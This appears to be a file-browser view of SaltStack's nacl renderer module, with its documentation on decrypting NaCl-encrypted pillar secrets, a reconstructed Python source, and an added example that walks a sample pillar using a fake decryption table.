Directory: /proc/self/root/proc/3522530/root/usr/lib/python2.7/site-packages/salt/renderers/
Current file: //proc/self/root/proc/3522530/root/usr/lib/python2.7/site-packages/salt/renderers/nacl.pyo
Renderer that will decrypt NACL ciphers

Any value in the SLS file can be an NACL cipher, and this renderer will decrypt it
before passing it off to Salt. This allows you to safely store secrets in
source control, in such a way that only your Salt master can decrypt them and
distribute them only to the minions that need them.

The typical use-case would be to use ciphers in your pillar data, and keep the
secret key on your master. You can put the public key in source control so that
developers can add new secrets quickly and easily. Only the public key should
ever be committed: anyone holding the secret key can decrypt every cipher, and
once decrypted on the master the values are distributed according to your normal
pillar targeting, so that targeting is the access control.

This renderer requires the libsodium library binary and the libnacl >= 1.5.1
python package (support for sealed boxes came in version 1.5.1).

Setup
-----

To set things up, first generate a keypair. On the master, run the following:

.. code-block:: bash

    # salt-call --local nacl.keygen sk_file=/root/.nacl

Using encrypted pillar
----------------------

To encrypt secrets, copy the public key to your local machine and run:

.. code-block:: bash

    $ salt-call --local nacl.enc datatoenc pk_file=/root/.nacl.pub

To apply the renderer on a file-by-file basis, add the following line to the
top of any pillar with nacl encrypted data in it:

.. code-block:: yaml

    #!yaml|nacl

Now with your renderer configured, you can include your ciphers in your pillar
data like so:

.. code-block:: yaml

    #!yaml|nacl
    a-secret: "NACL[MRN3cc+fmdxyQbz6WMF+jq1hKdU5X5BBI7OjK+atvHo1ll+w1gZ7XyWtZVfq9gK9rQaMfkDxmidJKwE0Mw==]"

Note that a value is only treated as ciphertext when the entire string is of
the form ``NACL[...]``; a cipher embedded inside a longer string is left as-is.
Module source, reconstructed from the names and constants visible in the
compiled ``nacl.pyo`` (``__salt__`` is injected by Salt's loader and provides
the ``nacl.dec`` execution-module function):

.. code-block:: python

    from __future__ import absolute_import, print_function, unicode_literals

    import logging
    import re

    import salt.utils.stringio
    import salt.syspaths
    import salt.ext.six as six

    log = logging.getLogger(__name__)

    # A value is only treated as ciphertext when the whole string is NACL[...]
    NACL_REGEX = r'^NACL\[(.*)\]$'


    def _decrypt_object(obj, **kwargs):
        '''
        Recursively try to decrypt any object. If the object is a six.string_types
        (string or unicode) and it is a valid NACL[...] cipher, decrypt it;
        dicts and lists are walked in place until strings are found; every
        other type is returned unchanged.
        '''
        if salt.utils.stringio.is_readable(obj):
            return _decrypt_object(obj.getvalue(), **kwargs)
        if isinstance(obj, six.string_types):
            match = re.search(NACL_REGEX, obj)
            if match is not None:
                # nacl.dec uses the master's secret key (sk_file from config
                # unless overridden via kwargs)
                return __salt__['nacl.dec'](match.group(1), **kwargs)
            return obj
        elif isinstance(obj, dict):
            for key, value in six.iteritems(obj):
                obj[key] = _decrypt_object(value, **kwargs)
            return obj
        elif isinstance(obj, list):
            for key, value in enumerate(obj):
                obj[key] = _decrypt_object(value, **kwargs)
            return obj
        else:
            return obj


    def render(nacl_data, saltenv='base', sls='', argline='', **kwargs):
        '''
        Decrypt the data to be rendered using the given nacl key or the one given
        in config
        '''
        return _decrypt_object(nacl_data, **kwargs)
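The walk the renderer performs over pillar data, as an added example that is not
part of the Salt source above. It mirrors the recursion and the anchored
``NACL[...]`` match, but the decryption step is a constructed lookup table
standing in for ``__salt__['nacl.dec']`` (no libsodium involved), and the pillar
structure, key names and payloads are constructed sample data. Note how a cipher
embedded in a longer string and non-string values pass through untouched, and
how an unknown payload fails loudly rather than silently leaking the ciphertext
to minions.

```python
import re
from typing import Any, Callable

# Same anchored pattern as the Salt renderer: the entire string must be
# NACL[...] for the value to be treated as ciphertext (no prefix or suffix).
NACL_REGEX = re.compile(r'^NACL\[(.*)\]$')


def decrypt_object(obj: Any, dec: Callable[[str], str]) -> Any:
    """Walk obj and replace every NACL[...] string with dec(payload).

    Mirrors the renderer's recursion: buffer-like objects are read with
    getvalue(), strings are tested against NACL_REGEX, dicts and lists are
    rewritten in place, and any other type (ints, bools, None) is returned
    unchanged.
    """
    if hasattr(obj, 'getvalue'):          # StringIO-style buffer
        return decrypt_object(obj.getvalue(), dec)
    if isinstance(obj, str):
        match = NACL_REGEX.search(obj)
        return dec(match.group(1)) if match else obj
    if isinstance(obj, dict):
        for key, value in obj.items():
            obj[key] = decrypt_object(value, dec)
        return obj
    if isinstance(obj, list):
        for idx, value in enumerate(obj):
            obj[idx] = decrypt_object(value, dec)
        return obj
    return obj


# Constructed stand-in for __salt__['nacl.dec']: a fixed table instead of a
# real libsodium sealed-box decryption, so the walk runs offline. A payload
# the "key" cannot open raises, as a wrong secret key does in production,
# so the ciphertext is never shipped to a minion as if it were plaintext.
FAKE_KEYRING = {
    'MRN3cc+fmdxyQbz6WMF+jq1hKdU5X5BBI7OjK+atvHo1ll+w1gZ7XyWtZVfq9gK9rQaMfkDxmidJKwE0Mw==': 'hunter2',
    'ZGItcGFzcw==': 'db-pass',
}


def fake_dec(payload: str) -> str:
    if payload not in FAKE_KEYRING:
        raise ValueError('payload was not encrypted to this key')
    return FAKE_KEYRING[payload]


def render_sample_pillar() -> dict:
    """Constructed pillar as it looks after the yaml stage of #!yaml|nacl."""
    pillar = {
        'a-secret': 'NACL[MRN3cc+fmdxyQbz6WMF+jq1hKdU5X5BBI7OjK+atvHo1ll+w1gZ7XyWtZVfq9gK9rQaMfkDxmidJKwE0Mw==]',
        'db': {'user': 'app', 'pass': 'NACL[ZGItcGFzcw==]', 'port': 5432},
        'extra': ['plain', 'NACL[ZGItcGFzcw==]'],
        # Not a full-string match, so the renderer leaves it alone:
        'note': 'rotate NACL[ZGItcGFzcw==] soon',
    }
    return decrypt_object(pillar, fake_dec)


if __name__ == '__main__':
    print(render_sample_pillar())
```

In a real master the `dec` callable is `nacl.dec` backed by the secret key
in `sk_file`; the structure of the walk is what determines which values are
touched, so auditing a pillar tree for strings that merely contain `NACL[`
(rather than being exactly `NACL[...]`) is a cheap way to catch secrets that
would otherwise be shipped encrypted but unusable.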